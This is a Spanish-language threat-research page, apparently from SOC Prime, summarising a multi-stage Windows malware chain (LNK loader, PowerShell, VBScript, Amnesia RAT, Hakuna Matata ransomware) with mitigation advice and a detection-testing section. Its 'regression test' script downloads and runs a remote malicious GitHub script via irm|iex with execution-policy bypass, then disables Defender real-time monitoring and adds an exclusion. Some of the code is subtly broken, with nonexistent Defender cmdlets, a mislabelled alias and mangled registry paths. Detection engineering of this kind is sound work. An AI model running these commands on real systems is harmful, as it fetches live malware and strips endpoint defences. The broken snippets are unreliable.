SOC Prime Bias: Alto

04 Feb 2026 14:20 UTC

Dentro de una Operación de Malware para Windows en Múltiples Etapas

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Seguir
Dentro de una Operación de Malware para Windows en Múltiples Etapas
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumen

FortiGuard Labs identificó una cadena de intrusión multi-etapa en Windows que comienza con un archivo LNK malicioso entregado dentro de un archivo comprimido. El acceso directo lanza un cargador inicial de PowerShell que descarga guiones desde GitHub y luego entrega el control a un orquestador de VBScript ofuscado. El flujo de trabajo luego intenta debilitar las defensas del endpoint al deshabilitar Microsoft Defender, desplegar la utilidad Defendnot y preparar tanto Amnesia RAT como el ransomware Hakuna Matata. La operación concluye dejando caer un componente WinLocker que bloquea el escritorio para interrumpir la recuperación y presionar a las víctimas.

Investigación

Los investigadores reconstruyeron el camino de ejecución desde la etapa de PowerShell activada por LNK hasta un VBScript que reconstruye cargas útiles en memoria, culminando en el despliegue de ransomware y un comportamiento de bloqueo del escritorio. Las medidas defensivas fueron eludidas a través de ediciones específicas del registro y mediante la inyección de un DLL Defendnot en Taskmgr.exe. Se implementó persistencia usando una combinación de entradas de claves Run y artefactos de la carpeta de inicio para reactivar la cadena después de iniciar sesión.

Mitigación

Monitoree cambios sospechosos a nivel de políticas en el registro bajo HKLMSOFTWAREPoliciesMicrosoftWindows Defender y HKCUSoftwareMicrosoftWindowsCurrentVersionPolicies. Bloquee la salida a URLs conocidas malignas de GitHub y Dropbox usadas para la preparación, y alerte sobre patrones de descarga y ejecución de PowerShell que se originen en inicios de LNK. Refuerce la lista de aplicaciones permitidas y ajuste los controles de ejecución de PowerShell para reducir el acceso inicial basado en guiones.

Respuesta

Si se detecta, aísle el endpoint, restaure la configuración del registro relacionada con Defender a un estado conocido bueno, y elimine archivos maliciosos y entradas de persistencia. Busque procesos activos de Amnesia RAT y actividad de red asociada, y valide si ocurrió la ejecución de ransomware. Realice un triage forense completo para dimensionar el impacto y erradicar restos, luego recupere los sistemas desde backups limpios donde sea posible.

Flujo de Ataque

Ejecución de Simulación

Requisito Previo: El Chequeo Previo de Telemetría & Línea Base debe haber sido aprobado.

Racional: Esta sección detalla la ejecución precisa de la técnica adversaria (TTP) diseñada para disparar la regla de detección. Los comandos y el relato DEBEN reflejar directamente los TTPs identificados y apuntar a generar la telemetría exacta esperada por la lógica de detección. Ejemplos abstractos o no relacionados llevarán a un diagnóstico incorrecto.

  • Narrativa de Ataque & Comandos:
    Un adversario que ha logrado un acceso inicial en el endpoint desea descargar y ejecutar una carga útil maliciosa de PowerShell mientras evade la política de ejecución predeterminada. Utilizan Invoke‑Expression (iex) combinado con Invoke‑WebRequest (irm) para extraer un guión desde una URL cruda remota de GitHub, ejecutándolo bajo -ExecutionPolicy Bypass. Después de establecer persistencia, desactivan el monitoreo en tiempo real de Windows Defender para evitar la detección de cargas útiles posteriores. Estos pasos generan directamente las cadenas de la línea de comandos que la regla Sigma observa.

  • Script de Prueba de Regresión:

    # --------------------------------------------------------------
    # Paso 1 – Ejecutar guión remoto con ExecutionPolicy Bypass
    # --------------------------------------------------------------
    $maliciousUrl = "https://github.com/Mafin111/MafinREP111/raw/refs/heads/main/ps1/kira.ps1"
    powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "irm '$maliciousUrl' | iex"
    
    # --------------------------------------------------------------
    # Paso 2 – Desactivar el monitoreo en tiempo real de Windows Defender
    # --------------------------------------------------------------
    # Desactivar la protección en tiempo real
    Disable-MpPreference -DisableRealtimeMonitoring $true
    # Agregar un camino de exclusión (simulado)
    Add-MpPreference -ExclusionPath "C:TempExcludeFolder"
  • Comandos de Limpieza:

    # Re-activar el monitoreo en tiempo real de Windows Defender
    Enable-MpPreference -DisableRealtimeMonitoring $false
    
    # Eliminar el camino de exclusión (si existe)
    Remove-MpPreference -ExclusionPath "C:TempExcludeFolder" -ErrorAction SilentlyContinue
    
    # Detener cualquier proceso de PowerShell persistente iniciado por el guión
    Get-Process -Name powershell | Where-Object {$_.StartInfo.Arguments -match 'kira.ps1'} | Stop-Process -Force